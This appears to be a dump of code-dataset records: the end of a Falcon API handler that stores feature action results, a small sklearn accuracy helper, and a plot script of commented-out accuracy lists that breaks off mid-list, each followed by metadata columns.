            v = unquote(w.value.decode("utf8")) or None
        kwargs[k] = v
    # CHECKS request checks ALL RIGHT. Continuing with code loading
    # Trying to initialize feature action manager module
    # NOTE(review): unlike make_action, no required-parameters check is
    # performed here — presumably intentional for partial updates; confirm.
    try:
        result = featobj.updateAction(action,**kwargs)
    except AttributeError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_IMPLEMENTED
        out.message = f"Action '{action}' not implemented."
        out.format(request=request, response=response)
        removetempfiles(toremove)
        return
    except Exception as e:
        traceback.print_exc()
        out.status = falcon.HTTP_BAD_REQUEST
        out.message = f"Action values error: {e}."
        out.format(request=request, response=response)
        removetempfiles(toremove)
        return
    # Best-effort reset of any previous entry for this (feature, action,
    # timestamp) key before storing the new value.
    try:
        db["actions"][feature,action,result['timestamp']]=None
    except Exception:
        pass
    # Persist the updated action result keyed by (feature, action, timestamp).
    try:
        db["actions"][feature,action,result['timestamp']]={"value":result}
        out.format(request=request, response=response)
    except KeyError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
        out.message = str(e)
        out.format(request=request, response=response)
    except ValueError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_BAD_REQUEST
        out.message = str(e)
        out.format(request=request, response=response)
    removetempfiles(toremove)
    return
| 35.20936
| 103
| 0.664498
| 1,747
| 14,295
| 5.364625
| 0.194619
| 0.032864
| 0.051643
| 0.070423
| 0.841656
| 0.82309
| 0.82309
| 0.82309
| 0.82309
| 0.811566
| 0
| 0.00473
| 0.24575
| 14,295
| 405
| 104
| 35.296296
| 0.864496
| 0.325149
| 0
| 0.84585
| 0
| 0
| 0.099006
| 0.005861
| 0
| 0
| 0
| 0.009877
| 0
| 1
| 0.027668
| false
| 0.011858
| 0.059289
| 0
| 0.158103
| 0.063241
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d85e96296e63d9423bcdab0d9951464cb67ee32
| 140
|
py
|
Python
|
src/utils/evaluator.py
|
bekirufuk/long_doc_classification
|
5777ce7fc3cc7150c12ca58cc12cf2d691656219
|
[
"MIT"
] | null | null | null |
src/utils/evaluator.py
|
bekirufuk/long_doc_classification
|
5777ce7fc3cc7150c12ca58cc12cf2d691656219
|
[
"MIT"
] | null | null | null |
src/utils/evaluator.py
|
bekirufuk/long_doc_classification
|
5777ce7fc3cc7150c12ca58cc12cf2d691656219
|
[
"MIT"
] | null | null | null |
from sklearn.metrics import accuracy_score
def compute_metrics(references, predictions):
    """Return the accuracy of *predictions* measured against *references*."""
    score = accuracy_score(references, predictions)
    return score
| 35
| 50
| 0.842857
| 16
| 140
| 7.1875
| 0.6875
| 0.226087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 140
| 4
| 50
| 35
| 0.912698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6d9a00f8b3170bdc633e550bb59a89a3829368f8
| 60,621
|
py
|
Python
|
plot.py
|
TylerCools/thesis
|
8195ca3b8658bdd10f4ce38c6b50cd2bbedd3e57
|
[
"MIT"
] | null | null | null |
plot.py
|
TylerCools/thesis
|
8195ca3b8658bdd10f4ce38c6b50cd2bbedd3e57
|
[
"MIT"
] | null | null | null |
plot.py
|
TylerCools/thesis
|
8195ca3b8658bdd10f4ce38c6b50cd2bbedd3e57
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
# Task 1
# y1 = [0.4516509433962264, 0.7894204851752021, 0.8288409703504043, 0.8320417789757413, 0.8431603773584906, 0.8529312668463612, 0.9371630727762803, 0.9836590296495957, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9979784366576819, 0.9979784366576819, 0.9979784366576819, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 
0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 
0.9991576819407008] #
# y1_Mem = [0.5139824797843666, 0.8340633423180593, 0.8965633423180593, 0.9518194070080862, 0.9905660377358491, 0.9973045822102425, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 
0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 
0.9996630727762803]
# y1_mem_oov = [0.5875415282392027, 0.7596345514950166, 0.7727574750830565, 0.7887043189368771, 0.7920265780730897, 0.795016611295681, 0.7948504983388704, 0.7935215946843854, 0.7897009966777409, 0.7827242524916943, 0.792358803986711, 0.779734219269103, 0.7888704318936877, 0.7926910299003322, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 
0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 
0.7925249169435216]
# Task 2
# y2 = [0.7871935756551142, 0.8361158072696534, 0.915469146238377, 0.9922865595942519, 0.9994716821639898, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 
0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 
0.9995773457311918]
# y2_mem_oov = [0.786046511627907, 0.7883720930232558, 0.7883720930232558, 0.787737843551797, 0.7881606765327696, 0.7882663847780127, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 
0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 
0.7885835095137421]
# Task 3
# y3 = [0.6478338989818327, 0.6818726292673188, 0.6994410061888601, 0.7390696745857457, 0.757236973447794, 0.7827909762427631, 0.8034537831902575, 0.8456777799960072, 0.8630465162707127, 0.8820123777201038, 0.9033739269315233, 0.9092633260131763, 0.9096626073068477, 0.9247354761429427, 0.9255340387302855, 0.9297264923138351, 0.9419045717708125, 0.9457975643841086, 0.9498901976442403, 0.9557795967258934, 0.9661609103613495, 0.9669594729486923, 0.9669594729486923, 0.9676582152126173, 0.9659612697145139, 0.9659612697145139, 0.9745458175284488, 0.9772409662607306, 0.9795368336993412, 0.9795368336993412, 0.9807346775803554, 0.9807346775803554, 0.9807346775803554, 0.9807346775803554, 0.9807346775803554, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9844280295468157, 0.9844280295468157, 0.9845278498702336, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 
0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9880215611898583, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9888201237772011, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9895188660411259, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 0.9906168895987223, 
0.9906168895987223]
# y3_mem_oov = [0.5628320392317123, 0.6181038005721291, 0.638332652227217, 0.6670412750306498, 0.6463015937883122, 0.6571311810380057, 0.6873722926031876, 0.6772578667756436, 0.6761340416836943, 0.6823661626481405, 0.6618308132407029, 0.6660196158561504, 0.6660196158561504, 0.6655087862689006, 0.6805271761340417, 0.6695954229668982, 0.6695954229668982, 0.6903351042092358, 0.6860441356763384, 0.6860441356763384, 0.6857376379239886, 0.6927870862280343, 0.6927870862280343, 0.6948304045770332, 0.6857376379239886, 0.6812423375561912, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6883939517776869, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 